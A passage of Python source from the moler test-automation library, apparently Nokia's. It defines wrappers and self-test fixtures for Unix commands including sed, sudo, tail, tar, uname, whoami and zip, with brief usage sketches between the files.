if self.output_file:
cmd = "{} > {}".format(cmd, self.output_file)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._command_error(line)
self._parse_line(line)
except ParsingDone:
pass
return super(Sed, self).on_new_line(line, is_full_line)
_re_command_error = re.compile(r"sed:\s(?P<ERROR>.*)", re.IGNORECASE)
def _command_error(self, line):
if self._regex_helper.search_compiled(Sed._re_command_error, line):
self.set_exception(CommandFailure(self, "ERROR {}".format(self._regex_helper.group("ERROR"))))
raise ParsingDone
def _parse_line(self, line):
self.current_ret['RESULT'].append(line)
raise ParsingDone
def _is_input_file(self):
is_empty = True
for file in self.input_files:
if file and not file.isspace():
is_empty = False
if is_empty:
raise CommandFailure(self, "No input file given in: {}".format(self.input_files))
def _validate_start(self, *args, **kwargs):
super(Sed, self)._validate_start(*args, **kwargs)
# _validate_start is called before running command on connection, so we raise exception instead of setting it
self._is_input_file()
COMMAND_OUTPUT = """xyz@debian:~$ sed -e 's/a/A/' old old2 > new
xyz@debian:~$"""
COMMAND_KWARGS = {
'scripts': ['s/a/A/'], 'output_file': 'new', 'input_files': ['old', 'old2']
}
COMMAND_RESULT = {
'RESULT': []
}
COMMAND_OUTPUT_to_stdout = """xyz@debian:~$ sed -e 's/a/A/' old old2
Apple
peAr
plum
xyz@debian:~$"""
COMMAND_KWARGS_to_stdout = {
'scripts': ['s/a/A/'],
'input_files': ['old', 'old2']
}
COMMAND_RESULT_to_stdout = {
'RESULT': ['Apple', 'peAr', 'plum']
}
COMMAND_OUTPUT_with_script_file = """xyz@debian:~$ sed -f script old old2 > new
xyz@debian:~$"""
COMMAND_KWARGS_with_script_file = {
'script_files': ['script'],
'output_file': 'new',
'input_files': ['old', 'old2']
}
COMMAND_RESULT_with_script_file = {
'RESULT': []
}
COMMAND_OUTPUT_with_option = """xyz@debian:~$ sed -i -e 's/a/A/' old old2
xyz@debian:~$"""
COMMAND_KWARGS_with_option = {
'options': '-i',
'scripts': ['s/a/A/'],
'input_files': ['old', 'old2']
}
COMMAND_RESULT_with_option = {
'RESULT': []
}
```
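The sketch below shows how the constructor parameters map onto the generated shell command; the device name, scripts and file names are illustrative assumptions.
```python
# Sketch only: 'my_devices.yml' / 'MyMachine' and all file names are placeholders.
from moler.config import load_config
from moler.device.device import DeviceFactory

load_config(config='my_devices.yml')
my_unix = DeviceFactory.get_device(name='MyMachine')
sed_cmd = my_unix.get_cmd(
    cmd_name="sed",
    cmd_params={"options": "-i",
                "scripts": ["s/a/A/", "s/b/B/"],   # each entry becomes -e '<script>'
                "script_files": ["fixups.sed"],    # each entry becomes -f <file>
                "input_files": ["old", "old2"],
                "output_file": "new"})             # appended as "> new"
# build_command_string() yields:
#   sed -i -e 's/a/A/' -e 's/b/B/' -f fixups.sed old old2 > new
result = sed_cmd()
print(result["RESULT"])   # [] when output is redirected; stdout lines otherwise
```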
#### File: cmd/unix/sudo.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018-2021, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.commandchangingprompt import CommandChangingPrompt
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
from moler.helpers import copy_dict
from moler.helpers import create_object_from_name
class Sudo(CommandChangingPrompt):
"""Unix command sudo"""
def __init__(self, connection, password=None, sudo_params=None, cmd_object=None, cmd_class_name=None,
cmd_params=None, prompt=None, newline_chars=None, runner=None, encrypt_password=True,
expected_prompt=None, set_timeout=None, set_prompt=None, target_newline="\n",
allowed_newline_after_prompt=False, prompt_after_login=None):
"""
Constructs object for Unix command sudo.
:param connection: Moler connection to device, terminal when command is executed.
:param password: password for sudo.
:param sudo_params: params for sudo (not for command for sudo)
:param cmd_object: object of command. Pass this object or cmd_class_name.
:param cmd_class_name: full (with package) class name. Pass this name or cmd_object.
:param cmd_params: params for cmd_class_name. If cmd_object is passed this parameter is ignored.
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
:param encrypt_password: If True then * will be in logs when password is sent, otherwise plain text.
:param set_timeout: Command to set timeout after reaching the expected prompt.
:param set_prompt: Command to set prompt after reaching the expected prompt.
:param target_newline: newline chars on the system where the command is executed.
:param allowed_newline_after_prompt: If True then newline chars may occur after expected (target) prompt.
:param prompt_after_login: prompt after login before send export PS1. If you do not change prompt exporting PS1
then leave it None.
"""
if expected_prompt is None or expected_prompt == '':
expected_prompt = prompt
super(Sudo, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner, expected_prompt=expected_prompt, set_timeout=set_timeout,
set_prompt=set_prompt, target_newline=target_newline,
allowed_newline_after_prompt=allowed_newline_after_prompt,
prompt_after_login=prompt_after_login)
if password is None:
password = ""
self.password = password
self.cmd_object = cmd_object
self.cmd_params = cmd_params
self.cmd_class_name = cmd_class_name
self.encrypt_password = encrypt_password
self.sudo_params = sudo_params
self.timeout_from_embedded_command = True # Set True to set timeout from command or False to use timeout set in
# sudo command.
self._sent_password = False
self._sent_command_string = False
self.newline_seq = "\n"
self._line_for_sudo = False
self._command_output_started = False
self.ret_required = False
self._validated_embedded_parameters = False # Validate parameters only once
self._finish_on_final_prompt = False
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
self._build_command_object()
cmd = "sudo"
if self.sudo_params:
cmd = "{} {}".format(cmd, self.sudo_params)
if self.cmd_object:
cmd = "{} {}".format(cmd, self.cmd_object.command_string)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise.
:return: None.
"""
try:
self._parse_password(line)
self._process_wrong_password(line)
self._parse_command_not_found(line)
self._parse_error(line)
except ParsingDone:
self._line_for_sudo = True
super(Sudo, self).on_new_line(line, is_full_line)
def start(self, timeout=None, *args, **kwargs):
"""Start background execution of connection-observer."""
if timeout is not None:
self.timeout_from_embedded_command = False
return super(Sudo, self).start(timeout=timeout, args=args, kwargs=kwargs)
def _process_line_from_command(self, current_chunk, line, is_full_line):
"""
Processes line from command.
:param current_chunk: Chunk of line sent by connection.
:param line: Line of output (current_chunk plus previous chunks of this line - if any) without newline char(s).
:param is_full_line: True if line had newline char(s). False otherwise.
:return: None.
"""
decoded_line = self._decode_line(line=line)
self._line_for_sudo = False
self.on_new_line(line=decoded_line, is_full_line=is_full_line)
if self.cmd_object:
if not self._line_for_sudo:
if not self.done() or self._command_output_started:
self._command_output_started = True
embedded_command_done = self.cmd_object.done()
self._process_embedded_command(partial_data=current_chunk)
if not embedded_command_done and self.cmd_object.done():
# process again because prompt was sent
self.on_new_line(line=decoded_line, is_full_line=is_full_line)
def _process_embedded_command(self, partial_data):
"""
Processes embedded command, passes output from device to embedded command.
:param partial_data: Line from device filtered by sudo, only for embedded command.
:return: None.
"""
if self.cmd_object:
if not self._sent_command_string:
self._sent_command_string = True
self.cmd_object.life_status._is_running = True
cs = "{}{}".format(self.cmd_object.command_string, self.newline_seq)
self.cmd_object.data_received(cs, self._last_recv_time_data_read_from_connection)
prev_cmd_timeout = self.cmd_object.timeout
self.cmd_object.data_received(partial_data, self._last_recv_time_data_read_from_connection)
new_cmd_timeout = self.cmd_object.timeout
if self.timeout_from_embedded_command and prev_cmd_timeout != new_cmd_timeout:
timedelta = new_cmd_timeout - prev_cmd_timeout
self.extend_timeout(timedelta=timedelta)
self.current_ret = self.cmd_object.current_ret
if self.cmd_object.done():
try:
result = self.cmd_object.result()
if self._finish_on_final_prompt is False and self.done() is False:
self.set_result(result=result)
except Exception as ex:
self.set_exception(ex)
self._finish_on_final_prompt = True
# sudo: pwd: command not found
_re_sudo_command_not_found = re.compile(r"sudo:.*command not found", re.I)
def _parse_command_not_found(self, line):
"""
Parses if command not found is found in line.
:param line: Line from device.
:return: None.
:raises: ParsingDone if regex matches the line.
"""
if re.search(Sudo._re_sudo_command_not_found, line):
self.set_exception(CommandFailure(self, "Command not found in line '{}'.".format(line)))
self._finish_on_final_prompt = True
raise ParsingDone()
# Sorry, try again.
_re_sudo_sorry_try_again = re.compile(r"Sorry, try again.", re.I)
def _get_wrong_password_regex(self):
return Sudo._re_sudo_sorry_try_again
def _process_wrong_password(self, line):
"""
Parses line for wrong password from sudo.
:param line: Line from device.
:return: None
:raises: ParsingDone if regex matches the line.
"""
if re.search(self._get_wrong_password_regex(), line):
if self._sent_password and not self._command_output_started:
self.set_exception(CommandFailure(self, "Command error password found in line '{}'.".format(line)))
self._finish_on_final_prompt = True
self._sent_password = False
raise ParsingDone()
# sudo: /usr/bin/sudo must be owned by uid 0 and have the setuid bit set
_re_sudo_error = re.compile(r"sudo:.*must be owned by uid\s+\d+\s+and have the setuid bit set|usage: sudo|"
r"sudo: \d+ incorrect password attempt|sudo: not found", re.I)
def _get_error_regex(self):
return Sudo._re_sudo_error
def _parse_error(self, line):
"""
Parses if a sudo error is found in line.
:param line: Line from device.
:return: None.
:raises: ParsingDone if regex matches the line.
"""
if re.search(self._get_error_regex(), line):
self.set_exception(CommandFailure(self, "Command su error found in line '{}'.".format(line)))
self._finish_on_final_prompt = True
raise ParsingDone()
# [sudo] password for user:
_re_sudo_password = re.compile(r"\[sudo\] password for.*:", re.I)
def _get_password_regex(self):
return Sudo._re_sudo_password
def _parse_password(self, line):
"""
Parses if sudo waits for password.
:param line: Line from device.
:return: None.
:raises: ParsingDone if regex matches the line.
"""
if re.search(self._get_password_regex(), line):
if not self._sent_password:
self.connection.sendline(self.password, encrypt=self.encrypt_password)
self._sent_password = True
raise ParsingDone()
def _validate_start(self, *args, **kwargs):
"""
Validates internal data before start.
:param args: args passed to super _validate_start
:param kwargs: kwargs passed to super _validate_start
:return: None.
:raises: CommandFailure if error in command settings.
"""
super(Sudo, self)._validate_start(*args, **kwargs)
self._validate_passed_object_or_command_parameters()
if self.cmd_object:
self.ret_required = self.cmd_object.ret_required
if self.timeout_from_embedded_command:
self.timeout = self.cmd_object.timeout
else:
self.ret_required = False
def _validate_passed_object_or_command_parameters(self):
"""
Validates passed parameters to create embedded command object.
:return: None
:raise: CommandFailure if command parameters are wrong.
"""
if self._validated_embedded_parameters:
return # Validate parameters only once
if not self.cmd_class_name and not self.cmd_object and not self.sudo_params:
# _validate_start is called before running command on connection, so we raise exception
# instead of setting it
raise CommandFailure(
self,
"Neither 'cmd_class_name' nor 'cmd_object' nor 'sudo_params' was provided to Sudo constructor."
"Please specific parameter.")
if self.cmd_object and self.cmd_class_name:
# _validate_start is called before running command on connection, so we raise exception instead
# of setting it
raise CommandFailure(
self,
"Both 'cmd_object' and 'cmd_class_name' parameters provided. Please specify only one."
)
if self.cmd_object and self.cmd_object.done():
# _validate_start is called before running command on connection, so we raise exception
# instead of setting it
raise CommandFailure(
self,
"Not allowed to run again the embedded command (embedded command is done): {}.".format(
self.cmd_object))
self._validated_embedded_parameters = True
def _build_command_object(self):
"""
Builds command object from passed parameters to sudo command.
:return: None
"""
self._validate_passed_object_or_command_parameters()
if self.cmd_object:
return
elif self.cmd_class_name is not None:
params = copy_dict(self.cmd_params)
params["connection"] = self.connection
params['prompt'] = self._re_prompt
params["newline_chars"] = self._newline_chars
self.cmd_object = create_object_from_name(self.cmd_class_name, params)
if self.cmd_object is None:
self._finish_on_final_prompt = True
COMMAND_OUTPUT_whoami = """
user@client:~/moler$ sudo whoami
[sudo] password for user:
root
user@client:~/moler$ """
COMMAND_RESULT_whoami = {
"USER": "root"
}
COMMAND_KWARGS_whoami = {
"cmd_class_name": "moler.cmd.unix.whoami.Whoami",
"password": "<PASSWORD>",
}
COMMAND_OUTPUT_dynamic_timeout = """
user@client:~/moler$ sudo nmap -sS -sV -p- -P0 -vvv --reason --webxml --min-rate 100 --max-rate 300 -oA ipv4 1.1.1.4 -PN
Starting Nmap 6.47 ( http://nmap.org ) at 2019-06-21 14:33 CEST
21 14:30:54.167 <|NSE: Loaded 29 scripts for scanning.
21 14:30:54.170 <|
|Initiating Parallel DNS resolution of 1 host. at 14:33
21 14:30:54.173 <|Completed Parallel DNS resolution of 1 host. at 14:33, 0.01s elapsed
|DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
21 14:30:54.189 <|Initiating SYN Stealth Scan at 14:33
|Scanning 1.1.1.4 [65535 ports]
21 14:30:54.395 <|Discovered open port 22/tcp on 1.1.1.4
|Discovered open port 80/tcp on 1.1.1.4
21 14:30:54.397 <|
|Discovered open port 443/tcp on 1.1.1.4
21 14:31:19.398 <|Increasing send delay for 10.83.182.11 from 0 to 5 due to 11 out of 33 dropped probes since last increase.
21 14:31:24.403 <|SYN Stealth Scan Timing: About 4.82% done; ETC: 14:43 (0:10:13 remaining)
21 14:31:24.405 |Extended timeout from 120.00 with delta 613.00 to 733.00
21 14:31:24.406 |Extended timeout from 120.00 with delta 613.00 to 733.00
21 14:31:45.896 <|Increasing send delay for 10.83.182.11 from 5 to 10 due to 11 out of 34 dropped probes since last increase.
21 14:31:54.237 <|SYN Stealth Scan Timing: About 5.32% done; ETC: 14:52 (0:18:05 remaining)
21 14:31:54.238 |Extended timeout from 733.00 with delta 1085.00 to 1818.00
21 14:31:54.239 |Extended timeout from 733.00 with delta 1085.00 to 1818.00
21 14:32:13.519 <|Increasing send delay for 10.83.182.11 from 10 to 20 due to 11 out of 32 dropped probes since last increase.
21 14:32:24.057 <|SYN Stealth Scan Timing: About 6.84% done; ETC: 14:55 (0:20:40 remaining)
21 14:32:24.058 |Extended timeout from 1818.00 with delta 1240.00 to 3058.00
21 14:32:24.059 |Extended timeout from 1818.00 with delta 1240.00 to 3058.00
21 14:32:42.300 <|Increasing send delay for 10.83.182.11 from 20 to 40 due to 11 out of 34 dropped probes since last increase.
21 14:32:53.886 <|SYN Stealth Scan Timing: About 8.35% done; ETC: 14:57 (0:22:08 remaining)
21 14:32:53.888 |Extended timeout from 3058.00 with delta 1328.00 to 4386.00
user@client:~/moler$ """
COMMAND_RESULT_dynamic_timeout = {
'SYN_STEALTH_SCAN': {
'DONE': '8.35',
'ETC': '14:57',
'REMAINING': '0:22:08'
}
}
COMMAND_KWARGS_dynamic_timeout = {
'cmd_class_name': r'moler.cmd.unix.nmap.Nmap',
'password': r'<PASSWORD>',
'cmd_params': {
'options': r'-sS -sV -p- -P0 -vvv --reason --webxml --min-rate 100 --max-rate 300 -oA ipv4',
'ip': r'1.1.1.4',
'is_ping': False
}
}
COMMAND_OUTPUT_ls = """
user@client:~/moler$ sudo ls -l
[sudo] password for user:
total 8
drwxr-xr-x 2 root root 4096 Sep 25 2014 bin
drwxr-xr-x 5 root root 4096 Mar 20 2015 btslog2
-rw-r--r-- 1 root root 51 Dec 15 10:48 getfzmip.txt
-rw-r--r-- 1 root root 24 Dec 15 10:48 getfzmip.txt-old.20171215-104858.txt
lrwxrwxrwx 1 root root 4 Mar 20 2015 bcn -> /bcn
lrwxrwxrwx 1 root root 10 Mar 20 2015 logsremote -> /mnt/logs/
user@client:~/moler$ """
COMMAND_RESULT_ls = {
"total": {
"raw": "8",
"bytes": 8,
},
"files": {
"bin": {"permissions": "drwxr-xr-x", "hard_links_count": 2, "owner": "root", "group": "root",
"size_bytes": 4096, "size_raw": "4096", "date": "Sep 25 2014", "name": "bin", },
"btslog2": {"permissions": "drwxr-xr-x", "hard_links_count": 5, "owner": "root", "group": "root",
"size_bytes": 4096, "size_raw": "4096", "date": "Mar 20 2015", "name": "btslog2", },
"getfzmip.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 51, "size_raw": "51", "date": "Dec 15 10:48", "name": "getfzmip.txt", },
"getfzmip.txt-old.20171215-104858.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1,
"owner": "root",
"group": "root", "size_bytes": 24, "size_raw": "24",
"date": "Dec 15 10:48",
"name": "getfzmip.txt-old.20171215-104858.txt", },
"bcn": {"permissions": "lrwxrwxrwx", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 4,
"size_raw": "4", "date": "Mar 20 2015", "name": "bcn", "link": "/bcn"},
"logsremote": {"permissions": "lrwxrwxrwx", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 10, "size_raw": "10", "date": "Mar 20 2015", "name": "logsremote",
"link": "/mnt/logs/"},
},
}
COMMAND_KWARGS_ls = {
"cmd_class_name": "moler.cmd.unix.ls.Ls",
"cmd_params": {"options": "-l"},
"password": "<PASSWORD>",
}
COMMAND_OUTPUT_ifconfigdown = """
moler_bash# sudo ifconfig lo down
moler_bash#"""
COMMAND_RESULT_ifconfigdown = {}
COMMAND_KWARGS_ifconfigdown = {
"cmd_class_name": "moler.cmd.unix.ifconfig.Ifconfig",
"password": "<PASSWORD>",
"cmd_params": {"options": "lo down"},
}
COMMAND_OUTPUT_i = """
moler_bash# sudo -i
root@host#"""
COMMAND_RESULT_i = {}
COMMAND_KWARGS_i = {
'sudo_params': '-i', 'expected_prompt': "root@host.*#"
}
COMMAND_OUTPUT_su = """
moler_bash# sudo su
root@host#"""
COMMAND_RESULT_su = {}
COMMAND_KWARGS_su = {
'expected_prompt': r"root@host.*#",
'cmd_class_name': 'moler.cmd.unix.su.Su',
'cmd_params': { # params for su
'expected_prompt': r"root@host.*#"
}
}
COMMAND_OUTPUT_sudo_su_pwd = """user@host$ sudo su -c 'pwd -P'
/home/auto/inv
user@host$"""
COMMAND_KWARGS_sudo_su_pwd = {
'cmd_class_name': 'moler.cmd.unix.su.Su', # su as parameter of sudo
'cmd_params': { # parameters for su
'cmd_class_name': 'moler.cmd.unix.pwd.Pwd', # pwd as parameter for su
'cmd_params': {'options': '-P'} # parameters for pwd
}
}
COMMAND_RESULT_sudo_su_pwd = {'full_path': '/home/auto/inv', 'path_to_current': '/home/auto', 'current_path': 'inv'}
COMMAND_OUTPUT_reboot = """sudo reboot
Connection to 192.168.255.179 closed by remote host.
"""
COMMAND_KWARGS_reboot = {
'cmd_class_name': 'moler.cmd.unix.reboot.Reboot', # reboot as parameter of sudo
}
COMMAND_RESULT_reboot = {
'RESULT': 'Connection to 192.168.255.179 closed by remote host.'
}
```
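A hedged sketch of the embedded-command mechanism described in the constructor docstring: sudo builds the wrapped command from cmd_class_name and cmd_params and returns that command's result. Device name and password are placeholders.
```python
# Sketch only: 'MyMachine' and the password are placeholders (cf. COMMAND_KWARGS_ls above).
from moler.config import load_config
from moler.device.device import DeviceFactory

load_config(config='my_devices.yml')
my_unix = DeviceFactory.get_device(name='MyMachine')
sudo_ls = my_unix.get_cmd(
    cmd_name="sudo",
    cmd_params={"cmd_class_name": "moler.cmd.unix.ls.Ls",  # class of the embedded command
                "cmd_params": {"options": "-l"},           # parameters for Ls, not for sudo
                "password": "secret"})                     # sent on "[sudo] password for ...:"
result = sudo_ls()               # result dict is produced by the embedded Ls command
print(sorted(result["files"]))   # file names parsed from 'ls -l' output
```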
#### File: cmd/unix/tail_latest_file.py
```python
import os
import time
from moler.cmd.unix.genericunix import GenericUnixCommand
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
class TailLatestFile(GenericUnixCommand):
def __init__(self, connection, directory, file_pattern="*", prompt=None, newline_chars=None, runner=None,
time_for_failure=0.1):
"""
Command for tail latest file from the directory.
:param connection: Moler connection to device, terminal when command is executed.
:param directory: path to directory to tail.
:param file_pattern: pattern for files from directory.
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
:param time_for_failure: time (in seconds) for failure indication from first line of output. Set to 0 to skip
all failure indications.
"""
super(TailLatestFile, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
self.directory = directory
self.file_pattern = file_pattern
self.ret_required = False
self.time_for_failure = time_for_failure
self._first_line_time = None
self._check_failure_indication = True
self._multiline_cmd = True
def build_command_string(self):
"""
Build command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
file_path = os.path.join(self.directory, self.file_pattern)
bash_script = "bash -c '\n" \
'echo "Press [CTRL+C] to stop.."\n' \
r'trap "kill \$tail_pid; exit" INT' \
'\n' \
'last_file=""\n' \
'tail_pid=""\n' \
'file_index=0\n' \
'while :\n' \
'do\n' \
'current_last_file=`ls -t {} | head -1`\n' \
'if [ "$last_file" != "$current_last_file" ]\n' \
'then\n' \
'[ -n "$tail_pid" ] && kill $tail_pid\n' \
'last_file=$current_last_file\n' \
'if [ "$file_index" -eq 0 ]\n' \
'then\n' \
'tail -f $last_file &\n' \
'else\n' \
'tail -f -n +1 $last_file &\n' \
'fi\n' \
'tail_pid=$!\n' \
'((file_index=file_index+1))\n' \
'fi\n' \
'sleep 0.5\n' \
"done'"
cmd = bash_script.format(file_path)
return cmd
def on_new_line(self, line, is_full_line):
"""
Parse line from command output.
:param line: Line from device
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
if not self._first_line_time:
self._first_line_time = time.time()
super(TailLatestFile, self).on_new_line(line=line, is_full_line=is_full_line)
def is_failure_indication(self, line):
"""
Check if line has info about failure indication.
:param line: Line from device
:return: None if line does not match regex with failure, Match object if line matches the failure regex.
"""
if self._check_failure_indication:
if time.time() - self._first_line_time < self.time_for_failure:
return self._regex_helper.search_compiled(self._re_fail, line)
else:
self._check_failure_indication = False # do not check time for future output. It's too late already.
return None
COMMAND_OUTPUT = r"""
user@host:~$ bash -c '
echo "Press [CTRL+C] to stop.."
trap "kill \$tail_pid; exit" INT
last_file=""
tail_pid=""
file_index=0
while :
do
current_last_file=`ls -t /tmp/sample_file* | head -1`
if [ "$last_file" != "$current_last_file" ]
then
[ -n "$tail_pid" ] && kill $tail_pid
last_file=$current_last_file
if [ "$file_index" -eq 0 ]
then
tail -f $last_file &
else
tail -f -n +1 $last_file &
fi
tail_pid=$!
((file_index=file_index+1))
fi
sleep 0.5
done'
Press [CTRL+C] to stop..
VmallocChunk: 34359608824 kB
HardwareCorrupted: 0 kB
AnonHugePages: 0 kB
HugePages_Total: 0
HugePages_Free: 0
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 2048 kB
DirectMap4k: 53184 kB
DirectMap2M: 4141056 kB
user@host:~$
"""
COMMAND_RESULT = {}
COMMAND_KWARGS = {
"directory": "/tmp",
"file_pattern": "sample_file*",
}
COMMAND_OUTPUT_command_not_found_in_output = r"""
user@server:~> bash -c '
echo "Press [CTRL+C] to stop.."
trap "kill \$tail_pid; exit" INT
last_file=""
tail_pid=""
file_index=0
while :
do
current_last_file=`ls -t /tmp/* | head -1`
if [ "$last_file" != "$current_last_file" ]
then
[ -n "$tail_pid" ] && kill $tail_pid
last_file=$current_last_file
if [ "$file_index" -eq 0 ]
then
tail -f $last_file &
else
tail -f -n +1 $last_file &
fi
tail_pid=$!
((file_index=file_index+1))
fi
sleep 0.5
done'
36B9 INF/LFS/LinuxSyslog error=No such file or directory
user@server:~>"""
COMMAND_RESULT_command_not_found_in_output = {
}
COMMAND_KWARGS_command_not_found_in_output = {
"directory": "/tmp",
"time_for_failure": 0
}
```
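Because this command wraps a never-ending bash watcher loop, it is normally started in the background rather than called synchronously. The sketch below is illustrative only; directory, pattern and device name are placeholders.
```python
# Sketch only: 'MyMachine', '/tmp/logs' and 'app_*.log' are placeholders.
from moler.config import load_config
from moler.device.device import DeviceFactory

load_config(config='my_devices.yml')
my_unix = DeviceFactory.get_device(name='MyMachine')
tail_cmd = my_unix.get_cmd(cmd_name="tail_latest_file",
                           cmd_params={"directory": "/tmp/logs",
                                       "file_pattern": "app_*.log"})
print(tail_cmd.command_string)   # the bash loop from COMMAND_OUTPUT above,
                                 # with /tmp/logs/app_*.log substituted in
tail_cmd.start()                 # run in background; re-tails whenever a newer file appears
# ... observe the connection output for a while ...
tail_cmd.cancel()                # stop observing on the moler side; the remote loop itself
                                 # is stopped with CTRL+C, as its banner says
```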
#### File: cmd/unix/tar.py
```python
from moler.cmd.unix.genericunix import GenericUnixCommand
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
class Tar(GenericUnixCommand):
def __init__(self, connection, options, file, prompt=None, newline_chars=None, runner=None):
super(Tar, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
# Parameters defined by calling the command
self.options = options
self.file = file
self.ret_required = False
def build_command_string(self):
cmd = "tar"
cmd = cmd + " " + self.options + " " + self.file
return cmd
COMMAND_OUTPUT = """
host:~ # tar xzvf test.tar.gz
test.1
test.2
test.3
host:~ # """
COMMAND_RESULT = {
}
COMMAND_KWARGS = {
"options": "xzvf",
"file": "test.tar.gz",
}
```
#### File: cmd/unix/uname.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
class Uname(GenericUnixCommand):
def __init__(self, connection, options=None, prompt=None, newline_chars=None, runner=None):
super(Uname, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.current_ret['RESULT'] = list()
def build_command_string(self):
cmd = "uname"
if self.options:
cmd = cmd + " " + self.options
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._command_error(line)
self._parse(line)
except ParsingDone:
pass
return super(Uname, self).on_new_line(line, is_full_line)
_re_invalid_option = re.compile(r"uname:\s(invalid|unknown)\soption\s(?P<OPTION>.*)", re.IGNORECASE)
_re_command_fail = re.compile(r"uname:\sextra\soperand\s(?P<COMMAND>.*)", re.IGNORECASE)
def _command_error(self, line):
if self._regex_helper.search_compiled(Uname._re_invalid_option, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("OPTION"))))
raise ParsingDone
elif self._regex_helper.search_compiled(Uname._re_command_fail, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("COMMAND"))))
raise ParsingDone
def _parse(self, line):
self.current_ret["RESULT"].append(line)
raise ParsingDone
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
# Parameters: -a ; -s
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_execute = """
xyz@debian:~$ uname -a
Linux debian 4.9.0-6-amd64 #1 SMP
Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 GNU/Linux
xyz@debian:~$"""
COMMAND_KWARGS_ver_execute = {
'options': '-a'
}
COMMAND_RESULT_ver_execute = {
'RESULT': ['Linux debian 4.9.0-6-amd64 #1 SMP', 'Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 GNU/Linux']
}
COMMAND_OUTPUT_without_option = """
xyz@debian:~$ uname
Linux
xyz@debian:~$"""
COMMAND_KWARGS_without_option = {'options': None}
COMMAND_RESULT_without_option = {'RESULT': ['Linux']}
```
#### File: cmd/unix/whoami.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import ParsingDone
class Whoami(GenericUnixCommand):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
super(Whoami, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
def build_command_string(self):
cmd = "whoami"
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_user(line)
except ParsingDone:
pass
return super(Whoami, self).on_new_line(line, is_full_line)
_re_user = re.compile(r"(?P<User>\S+)\s*$")
def _parse_user(self, line):
if self._regex_helper.search_compiled(Whoami._re_user, line):
self.current_ret["USER"] = self._regex_helper.group("User")
raise ParsingDone
COMMAND_OUTPUT = """
host:~ # whoami
ute
host:~ #"""
COMMAND_RESULT = {
"USER": "ute"
}
COMMAND_KWARGS = {}
```
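Whoami is the smallest command in this set, so it is a convenient place to spell out the end-to-end flow: load a config, get a device, get a command, call it. All names below are placeholders.
```python
# Sketch only: config path and device name are placeholders.
from moler.config import load_config
from moler.device.device import DeviceFactory

load_config(config='my_devices.yml')              # YAML describing available devices
my_unix = DeviceFactory.get_device(name='MyMachine')
whoami_cmd = my_unix.get_cmd(cmd_name="whoami")   # command looked up among the device's command packages
result = whoami_cmd()                             # blocking call
print(result["USER"])                             # e.g. 'ute', as in COMMAND_RESULT above
```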
#### File: cmd/unix/zip.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure, ParsingDone
class Zip(GenericUnixCommand):
def __init__(self, connection, options, file_name, zip_file, timeout=60, prompt=None, newline_chars=None,
runner=None):
super(Zip, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
# Parameters defined by calling the command
self.options = options
self.file_name = file_name
self.zip_file = zip_file
self.ret_required = False
self.timeout = timeout
def build_command_string(self):
if self.options:
cmd = "{} {} {} {}".format("zip", self.options, self.zip_file, self.file_name)
else:
cmd = "{} {} {}".format("zip", self.zip_file, self.file_name)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_error_via_output_line(line)
except ParsingDone:
pass # line has been fully parsed by one of above parse-methods
return super(Zip, self).on_new_line(line, is_full_line)
_re_zip_line = re.compile(r'(?P<error>zip error:.*)')
def _parse_error_via_output_line(self, line):
if self._cmd_output_started and self._regex_helper.search_compiled(Zip._re_zip_line, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("error"))))
raise ParsingDone
COMMAND_OUTPUT = """
host:~ # zip test.zip test.txt
adding: test.txt (deflated 76%)
host:~ # """
COMMAND_RESULT = {
}
